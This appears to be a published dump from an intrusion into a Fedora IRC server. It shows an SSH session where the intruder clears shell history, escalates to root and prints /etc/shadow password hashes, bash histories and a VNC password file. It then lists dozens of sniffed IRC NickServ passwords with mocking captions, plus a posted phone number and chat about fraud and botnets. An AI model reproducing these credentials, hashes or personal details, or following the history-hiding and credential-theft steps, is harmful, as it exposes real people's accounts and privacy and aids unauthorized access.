ZzwK45zhO03/wr3pGmQtZQbv9R2Jma/vSW7IFPmz2ZyZodLpr3QciqqPOn5xvC7 GFLrrrlBYzX8uggew4gUq9Uc9vxXrDKHh2aAz7rA+gPOM/1iq1Xuve754ZTOhdS XaasNJMb4U= 65.94.19.98 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAziexE08HtpgQFXCsqn1Hg0bn54ZzecIYNyN ZzwK45zhO03/wr3pGmQtZQbv9R2Jma/vSW7IFPmz2ZyZodLpr3QciqqPOn5xvC7 GFLrrrlBYzX8uggew4gUq9Uc9vxXrDKHh2aAz7rA+gPOM/1iq1Xuve754ZTOhdS XaasNJMb4U= 65.92.60.23 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAziexE08HtpgQFXCsqn1Hg0bn54ZzecIYNyN ZzwK45zhO03/wr3pGmQtZQbv9R2Jma/vSW7IFPmz2ZyZodLpr3QciqqPOn5xvC7 GFLrrrlBYzX8uggew4gUq9Uc9vxXrDKHh2aAz7rA+gPOM/1iq1Xuve754ZTOhdS XaasNJMb4U= 71.192.67.60 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAsRBHrWAwTKSWF0DdzGeLaWZYSGFjdPmtH+h i6rozw5akKT+l7JxMcPi0iW0kuImhOh/D7cVh7BlMQc5RjvrOigxN6RtrrUzE5i UhdHRdlbQ5XWaPJQZLH6nQMnCvtGsj432OMi5NiWAs8QUp0duiOUPCQxq3hV/wq 4MTqlP/Nk= server1,65.92.156.231 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAziexE08HtpgQFXCsqn1Hg0bn54ZzecIYNyN ZzwK45zhO03/wr3pGmQtZQbv9R2Jma/vSW7IFPmz2ZyZodLpr3QciqqPOn5xvC7 GFLrrrlBYzX8uggew4gUq9Uc9vxXrDKHh2aAz7rA+gPOM/1iq1Xuve754ZTOhdS XaasNJMb4U= 65.94.149.79 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAziexE08HtpgQFXCsqn1Hg0bn54ZzecIYNyN ZzwK45zhO03/wr3pGmQtZQbv9R2Jma/vSW7IFPmz2ZyZodLpr3QciqqPOn5xvC7 GFLrrrlBYzX8uggew4gUq9Uc9vxXrDKHh2aAz7rA+gPOM/1iq1Xuve754ZTOhdS XaasNJMb4U= 65.92.158.240 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAziexE08HtpgQFXCsqn1Hg0bn54ZzecIYNyN ZzwK45zhO03/wr3pGmQtZQbv9R2Jma/vSW7IFPmz2ZyZodLpr3QciqqPOn5xvC7 GFLrrrlBYzX8uggew4gUq9Uc9vxXrDKHh2aAz7rA+gPOM/1iq1Xuve754ZTOhdS XaasNJMb4U= server4.zloche.net,213.251.160.26 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA1nrkiWUjg+BGB83ed97xlvJYWNm8FeE91nh Xx05mZ4HVDADi0qGmYnlXbuywe7Kf4R42C5Gw+ZLMKdMYCsDqa89dqNuSl0Mx7/ qHPS3oQW/nPFC8cFo1pI6v/R180uxorB5ggcLV4mgbZZnc4TltUMbrLRHYfAi3H bwGj6bIiuE= zloche.net,80.248.208.223 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAzYgpHj6TWctv9JPyCM/uWdHMWWgnMmR9KkD XZuiGVSNc/FyxIq6soDPhQ6nsYw3NoKEczB1aC6u1RMqueWyd0LLZD2QIVmJ1ij RtQDibKXEmlquOTUNZzB0RQIKgI4FOlpojpqTMziRUom2qChYoVBFLimYvH+b3f claQaSichE= server4:/home/gumbie/Incoming# logout djdd@server4:~$ logout Connection to 213.251.160.26 closed. [deadlyacid@localhost ~]$ ssh stax@irc.liveits.com The authenticity of host 'irc.liveits.com (68.184.61.212)' can't be established. RSA key fingerprint is 39:88:8c:c6:83:7f:d4:c5:f4:aa:3b:96:82:1f:30:65. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added 'irc.liveits.com,68.184.61.212' (RSA) to the list of known hosts. stax@irc.liveits.com's password: Permission denied, please try again. stax@irc.liveits.com's password: [deadlyacid@localhost ~]$ ssh djdd@irc.liveits.com djdd@irc.liveits.com's password: Last login: Fri Jun 8 19:14:12 2007 from 192.168.2.3 [djdd@lila ~]$ unset HISTFILE ; unset SAVEHIST [djdd@lila ~]$ w 14:17:05 up 1 day, 19:54, 2 users, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT djdd pts/4 c-76-108-85-21.h 14:16 0.00s 0.08s 0.01s w [djdd@lila ~]$ ls -alh total 320K drwx------ 11 djdd djdd 4.0K Jun 8 20:58 . drwxr-xr-x 9 root root 4.0K Jun 5 10:11 .. -rw------- 1 djdd djdd 2.5K Jun 8 23:18 .bash_history -rw-r--r-- 1 djdd djdd 24 Jul 12 2006 .bash_logout -rw-r--r-- 1 djdd djdd 176 Jul 12 2006 .bash_profile -rw-r--r-- 1 djdd djdd 124 Jul 12 2006 .bashrc -rw-r--r-- 1 djdd djdd 67 Jun 7 20:08 .DCOPserver_lila.lan.liveits.com__0 lrwxrwxrwx 1 djdd djdd 46 Jun 7 20:08 .DCOPserver_lila.lan.liveits.com_:0 -> /home/djdd/.DCOPserver_lila.lan.liveits.com__0 drwx------ 2 djdd djdd 4.0K Jun 7 20:08 Desktop -rw------- 1 djdd djdd 26 May 13 14:33 .dmrc -rw-r--r-- 1 djdd djdd 122K May 28 02:50 firefoxweird.JPG -rw------- 1 djdd djdd 217 Jun 7 20:08 .ICEauthority drwx------ 2 djdd djdd 4.0K May 29 17:50 .irssi drwxrwsrwx 5 1000 1000 4.0K May 26 23:59 irssi-0.8.11 drwxr-xr-x 4 djdd djdd 4.0K Jun 7 20:08 .kde -rw------- 1 djdd djdd 35 Jun 8 20:53 .lesshst -rw-r--r-- 1 djdd djdd 0 Jun 8 20:17 lila.lan.liveits.com:2.log drwx------ 3 djdd djdd 4.0K May 13 14:33 .local drwxr-xr-x 3 djdd djdd 4.0K May 13 14:33 .mcop drwxr-xr-x 2 djdd djdd 4.0K Jun 7 20:08 .qt drwx------ 2 djdd djdd 4.0K Jun 5 11:15 .ssh -rw------- 1 djdd djdd 910 Jun 8 20:18 .viminfo drwxr-xr-x 2 djdd djdd 4.0K Jun 8 20:18 .vnc -rw------- 1 djdd djdd 163 Jun 8 20:58 .Xauthority -rw-r--r-- 1 djdd djdd 6.8K Jun 7 20:12 .xsession-errors [djdd@lila ~]$ cat .bash_history ifvonfig ifconfig exit ls w exit ls ping google.com yum install irssi exit tail /var/log/messages tail /var/log/secure chmod +r /var/log/messages su chmod +r /var/log/messages sudo chmod +r /var/log/messages chmod +r /var/log/messages sudo chmod +r /var/log/messages tail /var/log/messages tail /var/log/secure sudo chmod +r /var/log/secure tail /var/log/secure w w who exit sudo adduser robivy64 exit ls cd .. ls cd .. ls cd etc ls cd .. ls cd net ls dir cd .. ls cd usr ls cd share ls cd .. cd .. cd var ls cd ftp ls cd pub ls cd .. cd .. cd .. ls cd etc ls cp yp.conf /var/ftp/pub ls cd .. ls cd home cd djdd ls mv DVDPATH.TXT /var/ftp/pub sudo mv DVDPATH.TXT /var/ftp/pub ls cd irssi-0.8.11/ less install less INSTALL ping google.com ping google.com ls cd irssi-0.8.11 ls ./configure make su su sudo sudo make install cd .. cd .. ls cd djdd irssi screen irssi shutdown -r now ls sudo shutdown -r now sudo /sbin/shutdown -r now locate vsftpd cd .. cd .. ls cd etc cd vsftpd edit vsftpd.conf vi vsftpd.conf sudo vi vsftpd.conf sudo vi vsftpd.conf services vsftpd service vsftpd services vsftpd restart service vsftp restart vsftp restart ls cd .. cd rc.d cd init.d ls cd vsftpd service vsftpd restart /sbin/service vsftpd restart sudo /sbin/service vsftpd restart cd .. cd ,, cd .. cd .. ls cd etc cd vsftpd sudo vi vsftpd.conf sudo /sbin/service vsftpd restart cd /djdd cd /home/djdd ls ls sudo vi vsftpd.conf pwd cd .. cd .. ls cd etc cd vsftp ls cd vsftpd ls sudo vi vsftpd.conf up /sbin/up uptime w screen irssi exit iptables -L -n /sbin/iptables -L -n su- /sbin/iptables -L -n su /sbin/iptables -L -n sudo /sbin/iptables -L -n top sudo /sbin/service vncserver restart start x /sbin/start x screen -raAd exit sudo /sbin/iptables -L -n screen -raAd exit screen -raAd screen -raAd exit screen -raAd exit screen -raAd exit user exit ls -la vncconfig vncpasswd ls -la vncserver less .vnc/xstartup cd .. cd .. cd etc cd denyhosts ls pqd pwd mesg y write pts3 hey write gumbie hey write gumbie pts3 hey write gumbie 3 hey mesg y write gumbie hey write gumbie pts/3 hey w write gumbie pts/1 hey write gumbie 1 hey write gumbie pts1 hey cd .. cd var cd lib cd denyhosts sudo cd denyhosts su cd denyhosts su djdd cd denyhosts su djdd cd denyhosts su djdd cd denyhosts su djdd denyhosts su djdd sudo su - screen -raAd exit screen -raAd screen -raAd start vncserver service vncserver start /sbin/service vncserver start sudo /sbin/service vncserver start exit screen irssi top screen _raAd screen -raAd exit start x startx ls top screen -raAd [djdd@lila ~]$ cd .ssh [djdd@lila .ssh]$ ls -alh total 24K drwx------ 2 djdd djdd 4.0K Jun 5 11:15 . drwx------ 11 djdd djdd 4.0K Jun 8 20:58 .. -rw-r--r-- 1 djdd djdd 237 Jun 5 11:15 known_hosts [djdd@lila .ssh]$ cat known_hosts rmachine.net,80.248.208.223 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIE AzYgpHj6TWctv9JPyCM/uWdHMWWgnMmR9KkDXZuiGVSNc/FyxIq6soDPhQ6nsYw 3NoKEczB1aC6u1RMqueWyd0LLZD2QIVmJ1ijRtQDibKXEmlquOTUNZzB0RQIKgI 4FOlpojpqTMziRUom2qChYoVBFLimYvH+b3fclaQaSichE= [djdd@lila .ssh]$ cd [djdd@lila ~]$ cd .vnc [djdd@lila .vnc]$ ls -alh total 48K drwxr-xr-x 2 djdd djdd 4.0K Jun 8 20:18 . drwx------ 11 djdd djdd 4.0K Jun 8 20:58 .. -rw-r--r-- 1 djdd djdd 556 Jun 4 00:36 lila.lan.liveits.com:2.log -rw-r--r-- 1 djdd djdd 6 Jun 4 00:36 lila.lan.liveits.com:2.pid -rw------- 1 djdd djdd 8 Jun 4 00:35 passwd -rwxr-xr-x 1 djdd djdd 339 Jun 4 00:36 xstartup [djdd@lila .vnc]$ cat lila.lan.liveits.com\:2.log Xvnc Free Edition 4.1.2 Copyright (C) 2002-2005 RealVNC Ltd. See http://www.realvnc.com for information on VNC. Underlying X server release 70100000, The X.Org Foundation Mon Jun 4 00:36:25 2007 vncext: VNC extension running! vncext: Listening for VNC connections on port 5902 vncext: Listening for HTTP connections on port 5802 vncext: created VNC server for screen 0 Could not init font path element /usr/share/X11/fonts/OTF, removing from list! Could not init font path element /usr/share/X11/fonts/CID/, removing from list! [djdd@lila .vnc]$ cat lila.lan.liveits.com\:2.pid 21931 [djdd@lila .vnc]$ cat -tve passwd M-YIM-AO8NM-^Em[djdd@lila .vnc]$ [djdd@lila .vnc]$ uname -a Linux lila.lan.liveits.com 2.6.18-1.2798.fc6 #1 SMP Mon Oct 16 14:54:20 EDT 2006 i686 i686 i386 GNU/Linux [djdd@lila .vnc]$ cat /etc/redhat-release Fedora Core release 6 (Zod) [djdd@lila .vnc]$ sudo su -l Password: [root@lila ~]# unset HISTFILE ; unset SAVEHIST [root@lila ~]# cat /etc/shadow root:$1$wzF0PyjR$ZvLG.q6zdIoqTyfKXxlqq.:13646:0:99999:7::: bin:*:13646:0:99999:7::: daemon:*:13646:0:99999:7::: adm:*:13646:0:99999:7::: lp:*:13646:0:99999:7::: sync:*:13646:0:99999:7::: shutdown:*:13646:0:99999:7::: halt:*:13646:0:99999:7::: mail:*:13646:0:99999:7::: news:*:13646:0:99999:7::: uucp:*:13646:0:99999:7::: operator:*:13646:0:99999:7::: games:*:13646:0:99999:7::: gopher:*:13646:0:99999:7::: ftp:*:13646:0:99999:7::: nobody:*:13646:0:99999:7::: rpm:!!:13646:0:99999:7::: dbus:!!:13646:0:99999:7::: avahi:!!:13646:0:99999:7::: rpc:!!:13646:0:99999:7::: mailnull:!!:13646:0:99999:7::: smmsp:!!:13646:0:99999:7::: nscd:!!:13646:0:99999:7::: vcsa:!!:13646:0:99999:7::: haldaemon:!!:13646:0:99999:7::: rpcuser:!!:13646:0:99999:7::: nfsnobody:!!:13646:0:99999:7::: sshd:!!:13646:0:99999:7::: netdump:!!:13646:0:99999:7::: pcap:!!:13646:0:99999:7::: xfs:!!:13646:0:99999:7::: ntp:!!:13646:0:99999:7::: postgres:!!:13646:0:99999:7::: gdm:!!:13646:0:99999:7::: djdd:$1$6JY8zLTt$9SqrT5QbtJCyVxUKZXGGq0:13669:0:99999:7::: gumbie:$1$uCtksbF5$/fb98JXNKTL..dGYkEd45/:13660:0:99999:7::: ircd:$1$NkM7oRzi$kUyIWDiFZiydl3GpwkHv5/:13660:0:99999:7::: strayfe:$1$frE7jt1z$xXz6zHRmU75MrF6WiMWhb0:13658:0:99999:7::: robivy64:$1$s2t7XbSI$lHl122JS6Z/BvoS7FnT16/:13659:0:99999:7::: nagios:$1$2UnEJtD0$vqvMBdpDuWxuIi749N4IG.:13660:0:99999:7::: skeet:$1$nVQh8yKx$u.H249CNkRCAWItJrQjIc0:13669:0:99999:7::: [root@lila ~]# cd ~root [root@lila ~]# ls -alh total 336K drwxr-x--- 16 root root 4.0K Jun 8 11:22 . drwxr-xr-x 23 root root 4.0K Jun 7 18:23 .. -rw------- 1 root root 878 May 13 14:25 anaconda-ks.cfg -rw------- 1 root root 1.2K Jun 7 20:04 .bash_history -rw-r--r-- 1 root root 24 Jul 12 2006 .bash_logout -rw-r--r-- 1 root root 191 Jul 12 2006 .bash_profile -rw-r--r-- 1 root root 176 Jul 12 2006 .bashrc -rw-r--r-- 1 root root 100 Jul 12 2006 .cshrc -rw-r--r-- 1 root root 69 Jun 4 00:33 .DCOPserver_lila.lan.liveits.com__1 lrwxrwxrwx 1 root root 41 Jun 4 00:33 .DCOPserver_lila.lan.liveits.com_:1 -> /root/.DCOPserver_lila.lan.liveits.com__1 -rw-r--r-- 1 root root 68 May 24 21:27 .DCOPserver_localhost.localdomain__0 lrwxrwxrwx 1 root root 42 May 24 21:27 .DCOPserver_localhost.localdomain_:0 -> /root/.DCOPserver_localhost.localdomain__0 drwx------ 2 root root 4.0K Jun 4 00:24 Desktop -rw------- 1 root root 22 Jun 6 15:14 .dmrc drwxr-xr-x 3 root root 4.0K Jun 6 22:16 .frysk drwx------ 2 root root 4.0K Jun 7 20:08 .gconf drwx------ 2 root root 4.0K Jun 7 20:09 .gconfd drwx------ 3 root root 4.0K May 24 20:31 .gnome2 drwx------ 2 root root 4.0K May 24 20:31 .gnome2_private -rw------- 1 root root 657 Jun 7 20:04 .ICEauthority -rw-r--r-- 1 root root 29K May 13 14:24 install.log -rw-r--r-- 1 root root 3.6K May 13 14:10 install.log.syslog drwx------ 2 root root 4.0K Jun 7 19:23 .irssi drwxr-xr-x 4 root root 4.0K Jun 4 00:24 .kde -rw------- 1 root root 70 Jun 4 17:35 .lesshst drwx------ 3 root root 4.0K May 24 20:19 .local -rw------- 1 root root 26K May 27 07:45 mbox drwxr-xr-x 3 root root 4.0K May 24 20:19 .mcop drwx------ 3 root root 4.0K May 24 20:44 .mozilla drwxr-xr-x 2 root root 4.0K May 24 20:18 .qt -rw-r--r-- 1 root root 190 May 13 14:32 scsrun.log -r--r----- 1 root root 0 May 24 20:26 sudoers -rw-r--r-- 1 root root 129 Jul 12 2006 .tcshrc drwx------ 3 root root 4.0K May 24 21:14 .thumbnails drwxr-xr-x 2 root root 4.0K Jun 4 00:33 .vnc -rw------- 1 root root 163 Jun 4 00:33 .Xauthority -rw------- 1 root root 66 May 24 21:31 .xauthwsjdNh [root@lila ~]# cat .bash_history visudo sudoers visudo -f sudoers visudo sudoers edit /etc/sudoers ifconfig yum install irssi ping google.com yum install irssi ping google.com yum install irssi adduser strayfe passwd strayfe vi sudoers kedit sudoers visudo adduser robivy64 passwd robivy64 exit passwd robivy64 exit yum install csreen.i386 kill %1 yum install screen.i386 kill %1 less /etc/resolv.conf ifconfig route -n pico /etc/resolv.conf nano /etc/resolv.conf cat /etc/resolv.conf yum install screen.i386 ps x kill -9 20513 ps x yum install screen.i386 ls /home ls ~djdd/ ls ~djdd/irssi-0.8.11/ su - djdd adduser ircd ls ~ircd ls ~ircd -la cd /etc/sysconfig/ ls cat network nano network grep localhost * top kill pid 2080 kill 2080 kill yum-updatesd kill pid yum-updatesd kill 2080 yum-updatesd pwd cd .. pwd cd var cd lib cd denyhosts ls edit allowed-hosts vi allowed-hosts adduser skeet passwd skeet sudo exit passwd djdd exit passwd skeet exit ifconfig vi /etc/resolv.conf exit ping rmachine.net netstat -n irssi ifconfig vi /etc/resolv.conf vi /etc/resolv.conf serverice network restart servrice network restart service network restart ping google.com yum install gnome irssi [root@lila ~]# ps aux USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 1 0.0 0.2 2028 656 ? Ss Jun07 0:02 init [5] root 2 0.0 0.0 0 0 ? S Jun07 0:00 [migration/0] root 3 0.0 0.0 0 0 ? SN Jun07 0:00 [ksoftirqd/0] root 4 0.0 0.0 0 0 ? S Jun07 0:00 [watchdog/0] root 5 0.0 0.0 0 0 ? S< Jun07 0:00 [events/0] root 6 0.0 0.0 0 0 ? S< Jun07 0:00 [khelper] root 7 0.0 0.0 0 0 ? S< Jun07 0:00 [kthread] root 10 0.0 0.0 0 0 ? S< Jun07 0:00 [kblockd/0] root 11 0.0 0.0 0 0 ? S< Jun07 0:00 [kacpid] root 71 0.0 0.0 0 0 ? S< Jun07 0:00 [cqueue/0] root 74 0.0 0.0 0 0 ? S< Jun07 0:00 [khubd] root 76 0.0 0.0 0 0 ? S< Jun07 0:00 [kseriod] root 129 0.0 0.0 0 0 ? S Jun07 0:00 [pdflush] root 130 0.0 0.0 0 0 ? S Jun07 0:00 [pdflush] root 131 0.0 0.0 0 0 ? S< Jun07 0:00 [kswapd0] root 132 0.0 0.0 0 0 ? S< Jun07 0:00 [aio/0] root 285 0.0 0.0 0 0 ? S< Jun07 0:00 [kpsmoused] root 302 0.0 0.0 0 0 ? S< Jun07 0:01 [kjournald] root 327 0.0 0.0 0 0 ? S< Jun07 0:00 [kauditd] root 353 0.0 0.5 2904 1368 ? S NickServ : IDENTIFY IlmcC 192.168.39.2 : local -> nickserv : identify 1qaz@WSX # This is DJDD 192.168.39.2 : local -> nickserv : identify 60014885 192.168.39.2 : local -> nickserv : IDENTIFY al2003le # Here we see Stax 192.168.39.2 : local -> nickserv : identify AsDf567 192.168.39.2 : local -> NickServ : identify ghostworld 192.168.39.2 : local -> nickserv : identify nick1234(*)( # LOL 192.168.39.2 : local -> NickServ : identify rednexr0cksyo 192.168.39.2 : local -> NickServ : identify rednexrocksyo 192.168.39.2 : local -> NickServ : identify rroperbot 192.168.39.2 : local -> NickServ : identify usuck # No, you suck 192.168.39.2 : local -> NickServ : IDENTIFY viper$ 192.168.39.2 : local -> nickserv : register 1qaz@WSX big.drizzt@gmail.com 192.168.2.50 : local -> NickServ : IDENTIFY 31337 # Yea, right 192.168.2.50 : local -> NICKSERV : IDENTIFY boggybog 192.168.2.50 : local -> NickServ : identify coldhand 192.168.2.50 : local -> nickserv : identify gagster4life # holla back, homie! 192.168.2.50 : local -> nickserv : identify gowanlea 192.168.2.50 : local -> NickServ : identify richos_pass # Thanks for the nice password Richo. :) 192.168.2.50 : local -> NickServ : identify rroperbot 192.168.2.50 : local -> nickserv : identify tl1993 192.168.1.133 : local -> nicksev : identify faster 192.168.1.133 : local -> NICKServ : IDENTIFY allah1 192.168.1.133 : local -> NICKServ : REGISTER allah1 turbocharged06@gmail.com 192.168.1.133 : local -> NICKServ : REGISTER allah1 admin@arabian-outlaw.com 192.168.1.133 : local -> Nickserv : identify thearchangel 192.168.1.133 : local -> Nickserv : HELP REGISTER allah1 admin@arabian-outlaw.com # nice one 192.168.1.133 : local -> Nickserv : IDENTIFY 83624b 192.168.1.133 : local -> NickServ : IDENTIFY C@i7y 192.168.1.133 : local -> NickServ : IDENTIFY binary01 192.168.1.133 : local -> NickServ : IDENTIFY curtis1979 192.168.1.133 : local -> NickServ : IDENTIFY raven1 192.168.1.133 : local -> NickServ : IDENTIFY aaaaaa 192.168.1.133 : local -> nickserv : identify kristyabc 192.168.1.133 : local -> nickserv : identify portal87 192.168.1.133 : local -> nickserv : identify bandit 192.168.1.133 : local -> nickserv : register Necr0six@nerdshack.com zxcvbnm 192.168.1.133 : local -> nickserv : identify zxcvbnm 192.168.1.133 : local -> nickserv : identify blargh 192.168.1.133 : local -> nickserv : identify password1 # BAHAHAHAHA 192.168.1.133 : local -> nickserv : identify googleiscool # Sure is 192.168.1.133 : local -> NICKSERV : IDENTIFY hackerhandle18961991 192.168.39.2 : local -> NickServ : IDENTIFY bubbles18 192.168.39.2 : local -> nickserv : identify chackmate 192.168.39.2 : local -> nickserv : identify upiojlk 192.168.39.2 : local -> NickServ : IDENTIFY vfr1234r 213.251.160.26 : local -> NickServ : IDENTIFY KURDIES 213.251.160.26 : local -> nickserv : identify h4rnd3n16 # He wants her... 192.168.1.133 : StaxBot2_Serv3 -> Caity : I Want you <3... lets make robotic love! :P 192.168.1.133 : Stax -> Caity : I Want you <3... lets make robotic love! :P # Caity takes it 192.168.1.133 : local -> Caity : i wish i was from USA, this stupid norway shit is making everything harder.. 192.168.1.133 : local -> Caity : stfu n00b # He's no script kiddie! 192.168.1.133 : serial2k -> ReVoLT : well i have done some defacing 192.168.1.133 : serial2k -> ReVoLT : an rooting into servers and shity little stuff like that 192.168.1.133 : serial2k -> ReVoLT : and 192.168.1.133 : serial2k -> ReVoLT : remote puter 192.168.1.133 : serial2k -> ReVoLT : puters* 192.168.1.133 : serial2k -> ReVoLT : im not a script kiddie i do it through telnet and ftp # BUSTED! 192.168.1.133 : serial2k -> ReVoLT : look i swaer it wasn't me if it was why would i appologise course you going to get info about me tryng to get into your mail account # FRAUD ALERT! 192.168.1.133 : DJDD^Lap -> flea : i can set up a fake paypal account if you'd like, withdraw the money, put it into a bank account and then back to HBH, launder it for u 192.168.1.133 : flea -> DJDD^Lap : do you have cc gen? 192.168.1.133 : flea -> DJDD^Lap : were fuckin black hats. omg # Droppin' d0x 192.168.1.133 : Caity -> Ice_Chief : 678-458-0223 # I'm sure they'd love you too... 192.168.1.133 : local -> JuggaloAnt : hmm pretty cool stuff these h0no peope sound like my kinda people # packetz 192.168.1.133 : local -> jynx : stitchup and juggaloant want to run a botnet on our servers >.> # Gettin' 0wned 192.168.39.2 : Stitchup -> #opers : Hello matey 192.168.39.2 : Gumbie -> #opers : hiyas 192.168.39.2 : Stax -> #opers : someones playing with the BNC, well,a sk Stitchup, he found it 192.168.39.2 : Stitchup -> #opers : <-psyBNC> Sun Jun 10 13:11:25 :connect from cdma-mobile-dyn-TM-84-247-54-150.zappmobile.ro 192.168.39.2 : Stitchup -> #opers : <-psyBNC> Sun Jun 10 13:11:25 :Lost Connection from cdma-mobile-dyn-TM-84-247-54-150.zappmobile.ro () 192.168.39.2 : Stitchup -> #opers : Two attempts the same 192.168.39.2 : Gumbie -> #opers : he has admin on it, 192.168.39.2 : Gumbie -> #opers : i will look in a bit 192.168.39.2 : Stitchup -> #opers : Okie 192.168.39.2 : Gumbie -> #opers : they can't do much with password 192.168.39.2 : Gumbie -> #opers : with no password 192.168.39.2 : Stitchup -> #opers : Ja 192.168.39.2 : Stitchup -> #opers : Another connection attempt 192.168.39.2 : Stitchup -> #opers : And again 192.168.39.2 : Stitchup -> #opers : Gumbie 192.168.39.2 : Gumbie -> #opers : thats me 192.168.39.2 : Stitchup -> #opers : Want me to change your pass? 192.168.39.2 : Gumbie -> #opers : yeah 192.168.39.2 : Gumbie -> #opers : temp123 # Thanks buddy, we sure appreciate the passwords. 192.168.39.2 : Stitchup -> #opers : ACTION looks for command 192.168.39.2 : Stax -> #opers : ACTION is securing his game's server. I will try to stop all the SYN_FLOOD 192.168.39.2 : Stitchup -> #opers : Gumbie: Command syntax? 192.168.39.2 : Gumbie -> #opers : i forget the syntax 192.168.39.2 : Gumbie -> #opers : it's been awaile 192.168.39.2 : Stitchup -> #opers : Also 192.168.39.2 : Stitchup -> #opers : There's somebody else connecting to it 192.168.39.2 : Stitchup -> #opers : -psyBNC> Sun Jun 10 14:00:07 :connect from 89.42.15.39 192.168.39.2 : Stitchup -> #opers : <-psyBNC> Sun Jun 10 14:00:07 :Lost Connection from 89.42.15.39 () 192.168.39.2 : Stitchup -> #opers : I can't find the command 192.168.39.2 : Stitchup -> #opers : Not on their site 192.168.39.2 : Stitchup -> #opers : :\ # oper abuse! 80.248.208.223 : local -> operserv : svsnick Richo DJsBitch 80.248.208.223 : local -> operserv : svsnick Stitchupsbitch log_dj # Man love 192.168.39.2 : local -> ChanServ : TOPIC #hbh Raster wants cock! 192.168.1.133/#hbh:192.168.1.133 : DJ_Double_D -> #hbh : this is the last time im gonna tell u Stitchup, im not gonna give u a BJ >.< # leet haqrz 192.168.39.2 : Stitchup -> coldhand : All ports filtered 192.168.39.2 : Stitchup -> coldhand : Apparently 192.168.39.2 : Stitchup -> coldhand : lol 192.168.39.2 : Stitchup -> coldhand : 0wn3d 192.168.39.2 : Stitchup -> coldhand : ^^ 192.168.39.2 : Stitchup -> coldhand : nmapp1ng 192.168.39.2 : Stitchup -> coldhand : bt ~ # nmap -P0 -sS -A 80.47.191.58 192.168.39.2 : Stitchup -> coldhand : Too many fingerprints match this host to give specific OS details 192.168.39.2 : Stitchup -> coldhand : OS and Service detection performed. Please report any incorrect results at http://insecure.org/nmap/submit/ . 192.168.39.2 : Stitchup -> coldhand : Nmap finished: 1 IP address (1 host up) scanned in 346.532 seconds 192.168.39.2 : Stitchup -> coldhand : Shell? # the leet b0tnet mazter 192.168.1.133/#hbh:192.168.1.133 : Stitchup -> #hbh : Anybody wanna buy a botnet? 192.168.1.133/#hbh:192.168.1.133 : Stitchup -> #hbh : Downloading botnet apps 192.168.1.133/#hbh:192.168.1.133 : Stitchup -> #hbh : If you D0S that bot you'll be in trouble 192.168.1.133/#hbh:192.168.1.133 : Stitchup -> #hbh : If you DoS this network or park bots here you'll be in a lot of trouble 192.168.1.133/#hbh:192.168.1.133 : Stitchup -> #hbh : I got something you'd like if you're into botnets 192.168.1.133/#hbh:192.168.1.133 : Stitchup -> #hbh : I got source code to about 400 bots 192.168.1.133/#hbh:192.168.1.133 : Stitchup -> #hbh : I'm talking about DoS bots 192.168.1.133/#pokemon:192.168.1.133 : Stitchup -> #pokemon : http://stitchup.servebeer.com/botnet/ # ^ LOL 192.168.1.133/#pokemon:192.168.1.133 : Stitchup -> #pokemon : There's my bot apps 66.168.245.176/#pokemon:66.168.245.176 : Stitchup -> #pokemon : Trying to make a bot that'll try to drop itself into an IO stream before hiding somewhere else # But first he needs to learn how to code! 69.163.232.231/#hbh:69.163.232.231 : Stitchup -> #hbh : ACTION wants to steal some crazy ass source code he just seen on bluehel # 1337 192.168.1.133 : JuggaloAnt -> #hbh : me and sleazoid are mad 1337 hax0rs 192.168.1.133 : Burzhi` -> #hbh : # oh noez! XSS!!! 192.168.1.133 : z3ro -> #hbh : ACTION is 1337 192.168.1.133 : Peer -> #hbh : and it will have 1337 hax 192.168.1.133 : atreyu556 -> #hbh : download some 1337 hax 192.168.1.133 : Caity -> #hbh : 1337 dreams, everyone. 192.168.1.133 : DJDD^Work -> #hbh : ACTION is a hardware 31337 192.168.1.133 : Peer -> #hbh : I am so 1337, I shit perl code 192.168.1.133 : s25 -> #hbh : zero-1337 surely means you are 0% 1337 # BUUURN!!! 192.168.1.133 : LuxIgnis -> #hbh : I'm just not uber-1337 192.168.1.133 : LuxIgnis -> #hbh : well, okay, maybe uber-1337, just not hyper-1337.. 192.168.1.133 : Caity -> #hbh : It would definately make you 1337 192.168.1.133 : Zero -> #hbh : he is more 1337 (as everyone says) 192.168.1.133 : DosKey -> #hbh : You are 1337 though. 192.168.1.133 : DosKey -> #hbh : ACTION only php about 2 1/2 years. I could say i am 1337 at php. 192.168.1.133 : z3ro -> #hbh : i spek teh uB3r 1337 dawgs 192.168.1.133 : fastfinger -> #hbh : or call me 1337 192.168.1.133 : Nubilosus -> #hbh : at least more 1337 than i'll ever be...:P 192.168.1.133 : Nubilosus -> #hbh : 1337 ;) 192.168.1.133 : kaksii -> #hbh : ACTION is your new 1337 chess master 192.168.1.133 : kaksii -> #hbh : ACTION pwns u all with his 1337 chess skillz # skillz that killz 192.168.1.133 : kaksii -> #hbh : ACTION is talking to him 1337 self 192.168.1.133 : kaksii -> #hbh : oh my 1337 smilies are the best 192.168.1.133 : kaksii -> #hbh : I have copyroghts on my 1337 smilies (R) _/~~\.{(^'_'^)}./~~\_ 192.168.1.133 : Stax -> #hbh : You know, these kids saying they are 1337 h4ck3rs and in fact, they sue sub7 192.168.1.133 : DosKey -> #hbh : Which chan #help sucks and #hackthissite is always full of ghey but 1337 shit 192.168.1.133 : netfish -> #hbh : pwn it, but haxx0ring the liquor st0re through IRC... j00 r 1337 caity, goddamn it. Start behaving like it! 192.168.1.133 : kaksii -> #hbh : ACTION pwnz u all with his 1337 chess skillz 192.168.1.133 : Skunkfoot -> #hbh : use your 1337 S.E. skills ;) 192.168.1.133 : pwner -> #hbh : nub thiks he is 1337 192.168.1.133 : sparrow -> #hbh : everyone is scared of your 1337n3ss # leet 192.168.1.133 : ReVoLT -> #hbh : i wish i had leet skillz 192.168.1.133 : JuggaloAnt -> #hbh : im so leet # BAHAHAHAH 192.168.1.133 : Nubilosus -> #hbh : yeham I figured out it was leet 